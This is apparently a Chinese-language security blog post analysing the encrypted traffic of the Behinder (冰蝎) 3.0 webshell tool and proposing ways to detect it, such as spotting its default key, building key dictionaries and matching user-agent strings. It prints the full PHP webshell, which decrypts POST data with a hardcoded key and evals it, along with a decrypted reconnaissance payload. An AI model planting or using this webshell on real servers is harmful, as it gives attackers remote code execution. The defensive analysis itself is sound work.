冰蝎3.0流量分析的一些思考

  • A+
所属分类:安全文章

背景

在上一篇文章撰写时,冰蝎还尚未更新为3.0版本,HW前夕,冰蝎更新,经过了几天的迭代,很多特性也都在逐步完善,本文仍然从流量的角度,对冰蝎及其与服务端进行交互的情况进行分析,希望能够抛砖引玉,与大家更好的对该工具进行分析与研究。

代码分析

冰蝎服务端代码进行了一些更新,主要去除了明文化的密钥协商过程,以 PHP 为例,代码如下:

<?php@error_reporting(0);session_start();    $key="e45e329feb5d925b";     $_SESSION['k']=$key;    $post=file_get_contents("php://input");    if(!extension_loaded('openssl'))    {        $t="base64_"."decode";        $post=$t($post."");
for($i=0;$i<strlen($post);$i++) { $post[$i] = $post[$i]^$key[$i+1&15]; } } else { $post=openssl_decrypt($post, "AES128", $key); } $arr=explode('|',$post); $func=$arr[0]; $params=$arr[1]; class C{public function __invoke($p) {eval($p."");}} @call_user_func(new C(),$params);?>

关键代码如下: $key="e45e329feb5d925b";

通过将动态协商确定的密钥改为预共享密钥,能够避免分析人员从流量中直接获取密钥,并进行解密分析。

数据抓取

使用 Wireshark 工具,能够抓取到相关流量,经分析发现,新版冰蝎使用 POST 方式向服务端提交数据,而非 GET 方式,使用 Wireshark 提供的 追踪流 工具,能够追踪相关数据。

冰蝎3.0流量分析的一些思考

加密请求数据解密

假设我们已知加密密钥为冰蝎使用的默认密钥 e45e329feb5d925b ,使用AES在线解密工具[1]能够快速的解密相关数据。

使用 Base64解码工具[2]可以对解密后的数据进行解码,以获取冰蝎工具的真实意图,以显示 phpinfo() 信息为例,经解密及解码处理后冰蝎真实意图代码如下所示:

error_reporting(0);function main($whatever) {    ob_start(); phpinfo(); $info = ob_get_contents(); ob_end_clean();    $driveList ="";    if (stristr(PHP_OS,"windows")||stristr(PHP_OS,"winnt"))    {        for($i=65;$i<=90;$i++)        {            $drive=chr($i).':/';            file_exists($drive) ? $driveList=$driveList.$drive.";":'';        }    }    else    {        $driveList="/";    }    $currentPath=getcwd();    //echo "phpinfo=".$info."n"."currentPath=".$currentPath."n"."driveList=".$driveList;    $osInfo=PHP_OS;    $result=array("basicInfo"=>base64_encode($info),"driveList"=>base64_encode($driveList),"currentPath"=>base64_encode($currentPath),"osInfo"=>base64_encode($osInfo));    //echo json_encode($result);    session_start();    $key=$_SESSION['k'];    //echo json_encode($result);    //echo openssl_encrypt(json_encode($result), "AES128", $key);    echo encrypt(json_encode($result), $key);}
function encrypt($data,$key){ if(!extension_loaded('openssl')) { for($i=0;$i<strlen($data);$i++) { $data[$i] = $data[$i]^$key[$i+1&15]; } return $data; } else { return openssl_encrypt($data, "AES128", $key); }}$whatever="qpTk2PXJhWpTAkjb6rffMbHgW89Qhq5rVy7WDawWa6UYOlK0muLWckFrwLkfH8bjCI21o4FNnDcLwOSOMemVwPCLA9K6GFqxuwsglP6lGCcbaiRCOIq5JyPB4unCAYdZRlWrDOKo1oXer0Vmo5m7Lk8Tl3ojNbik5HXxBBqHqI3AXGT2wENXz3dT2h8oeBzD8vP9uiJvmQNoph62yYtyFrvtf0Vgueh2wQ8n7xWlal125Zo9EMdL0poLsK4wRm4Czr367NI7wE2cSWRE60NCQp2u55xbtLmqRRXZlufxjB1ACBuYSrEmEmuKz2ph16CtWqeuL3pzYzopfOHJQypq9ixnomgQaVR9kBbOndswdyM4Kdu5m9AOqJMMdfZbDyhwKhYSUXs4XM5WhAMAx80lW7mbcHZn01I4uD6agKzHULZ76vkoNIbAStTDwbajcExgnKszMuTucdwkpWCSb5Bzn7hqNdnTHExpvHiaqM5ZRJ82g7CxRQRTM2EMTc6GqtJEFzs5FQRwXrVqifdmA4S5aeYCITjJf5uhJ0N3jEVB88iAvOONWLN5M7Sgau5YbaJNvrGdZUMRgDAENmjK4Y2QvEuWbgtGzY0vy1zCAdrVNtqgJ3y7TJZxzhWWZwmsmj1TKk7ZnVsQlRUSYGYTBcTd9g9WszevN9UFsvU09i5GuXylPzxxgxpH9jy7yE7dfjThCiV5VqKiqu2iGCluYUezUkBMT2AZTNQbsBzBIdKvlBF1gt9CFYsngtmcx8EAcdZU00qrTmatN5KZ2UExhT9egq8zPuKI3SPiwtJgvrSo0HyOxeQDuIAhn03HhfQQpRW4jbi2rF0rTfiZlMLpTefHkNl0O8uBVQ6eBQnWiTrR6mM5uqB9J8jHvh9s4RTdXYm4bF05YEBDS4OxfFj3gFlXYRKfuzarClhPx51huZs0Opm2";main($whatever);

$whatever 变量,起到数据填充作用,以避免 HTTP 头中的 Content-Length 字段数据被作为侧信道特征以对该工具进行识别与分析。

加密响应数据解密

以通过命令行执行 whoami ,响应数据同样会使用密钥进行加密,使用相同密钥进行解密,效果如下:

冰蝎3.0流量分析的一些思考

经Base64解码处理,实际数据内容为:

nt authoritysystem

加密请求流量的分析

当使用相同密钥对部分内容相似的数据进行加密时,得到的加密结果有部分保持一致,通过先后两次抓取冰蝎获取 phpinfo() 的流量发现,使用相同密钥加密的密文,有部分内容是完全一致的!如下所示:

加密流量一:

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

加密流量二:

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

有兴趣的朋友可以用这两段数据配合上文提到的工具进行解密,比较差异能够发现:使用相同密钥加密数据时,加密数据的主要差异源于 $whatever 变量填充内容差异导致的加密结果差异。

针对冰蝎新版本特征分析的一些思考

新版本冰蝎加入了许多特性,相较V2版本,检测方法变得更加复杂,但这并不代表冰蝎已经成为一个完全无敌的工具,以我的理解:对冰蝎分析极为重要的角度之一可以是:尝试获取冰蝎加密数据所使用的密钥。至少有了密钥,总能够解密使用该密钥加密的数据。

针对新版本冰蝎,经过思考与讨论,我们暂时考虑到了如下几种方案,作为后续研究的参考:

1.服务端持续监控关键路径下的文件内容,如果找到诸如 $key="e45e329feb5d925b"; 或 e45e329feb5d925b 这类敏感数据,可以结合流量,解密相关数据并进行后续分析。

    2.构造密钥字典,对加密流量内容进行实时解密,提取有真实语义的内容。    3.在冰蝎未尝试随机化 UA 字段前,仍然可以考虑将 UA 作为一项轻特征对冰蝎进行初步判别。尴尬的是,经过分析,目前已出现了新的特征,如:Mozilla/5.0 (iPad; CPU OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/84.0.4147.122 Mobile/15E148 Safari/604.1

References

[1] AES在线解密工具: http://tools.bugscaner.com/cryptoaes/
[2] Base64解码工具: http://tool.chinaz.com/Tools/Base64.aspx


喜欢就请关注我们吧!

冰蝎3.0流量分析的一些思考

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: